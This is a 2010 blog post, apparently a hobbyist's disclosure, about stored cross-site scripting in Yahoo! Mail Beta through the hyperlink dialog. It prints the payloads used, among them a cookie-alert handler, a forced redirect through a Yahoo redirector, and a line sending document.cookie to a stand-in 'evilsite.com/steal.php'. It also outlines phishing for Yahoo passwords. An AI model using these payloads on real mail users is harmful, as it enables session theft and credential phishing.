Friday, February 12, 2010

Yahoo! Mail Beta - XSS all the way

I briefly looked at the new features and then proceeded onto the new look Yahoo! Mail. After watching a boy bounce on a green space hopper for a while, with the words "Yahoo loading", I went and got a drink. Eventually when I got back it had loaded up. Now I regret to say I was quite impressed with how they laid it all out. It has been designed to look and feel like a piece of email software, like outlook or thunderbird. However the full user interactivity and the differnt frames gave me a bad feeling, so I decided (for my own security reasons) to test out what may happen with a bit of XSS. So firstly, I simply started an email and wrote:

<script>alert("Ohno");</script>

I clicked on send and hoped Yahoo hadnt been that dumb. Opening the email I found out, they hadnt. Good for them. So I decided to move it up a step, and sent myself a html link. This is where the problem started. I wrote the word "Test" and highlighted it. I then clicked on their button to make a hyperlink. It gave me the option of choosing different types of links (ftp: etc.), but I stuck with http://. I entered in the following:

http://www.yahoo.com">Here</a><script>alert("Ohno");</script>

Clicked ok, and sent the email. Upon picking the email up, I recieved a pop-up message simple saying "Ohno". Oh no indeed. I had to check that other things were not possible using this flaw, so I tried to view my cookie using an alert box, thinking they may have put it a check for the document.cookie command:

http://www.yahoo.com" onMouseOver="alert(document.cookie)";

I sent the email, picked it up, and hovered my mouse over the link. A second later, an alert box popped up, with information that was stored in my cookie. Thinking that I could SEE my cookie, I wondered if it was possible to SEND my cookie somewhere, or even get the user to navigate to a web page. "Sure" I thought. "Just change the code using window.location and then a website and the website should pop-up!" So I tried it out:

http://www.yahoo.com">Here</a><script>window.location="www.datastronghold.com"</script>

Once picked up, I was dismayed a little to say the least. It hadnt worked. I was presented instead with a Yahoo error page, saying it was unable to find the link. Now, I know the site is there. YOU know the site is there. So why didnt Yahoo let me get onto it? They have been clever in a little way to say the least, it seems that only Yahoo sites could be displyed through the lower pane. SUrely that'll stop any fraud sites wont it? Of course not. A little simple modification, and the link works fine:


http://www.yahoo.com">Here</a><script>window.location="http://rds.yahoo.com/_ylt=A0geusygW9xE.v4AcCNXNyoA;_ylu=X3oDMTE3N3F0cXNhBGNvbG8DZQRsA1dTMQRwb3MDMgRzZWMDc3IEdnRpZANGNzcyXzEyNQ--/SIG=12bop18fo/EXP=1155378464/**http%3a//www.datastronghold.com"</script>

In case you don't know, the URL shown there is a link that I took from the Yahoo search engine, when it links to another page. Just by visiting a random page through yahoo and trimming off the url at the end, you can freely add your own, and the XSS script works fine! In fact, if the user tries to view any of their other emails, they cant! They are stuck with that page!

WARNING: This could lead to exploititive use, such as requeting for Yahoo user names and passwords, seeing as the url is not shown unless you view the pages properties, allowing phising sites to fake Yahoo logon pages, stating the users time on the email account has run out and they need to log in again. This, as well as allowing cookies to be sent to a php script for example:

http://www.yahoo.com">Here</a><script>window.location="http://rds.yahoo.com/_ylt=A0geusygW9xE.v4AcCNXNyoA;_ylu=X3oDMTE3N3F0cXNhBGNvbG8DZQRsA1dTMQRwb3MDMgRzZWMDc3IEdnRpZANGNzcyXzEyNQ--/SIG=12bop18fo/EXP=1155378464/**http%3a//www.evilsite.com/steal.php?"+document.cookie</script>

Provides a mssive problem for BT and Yahoo. I have yet to find a suitable contact for BT and Yahoo to report this to, so here it is for your educational purposes: Do NOT use Yahoo! Mail Beta. I cannot stress that enough!

Legal note (so I dont get sued): I provide the above information as educational information and in no way encourage or support the mis-use of this information.

1 comments:

Unknown said...

security@yahoo-inc.com is a good address to report issues like this.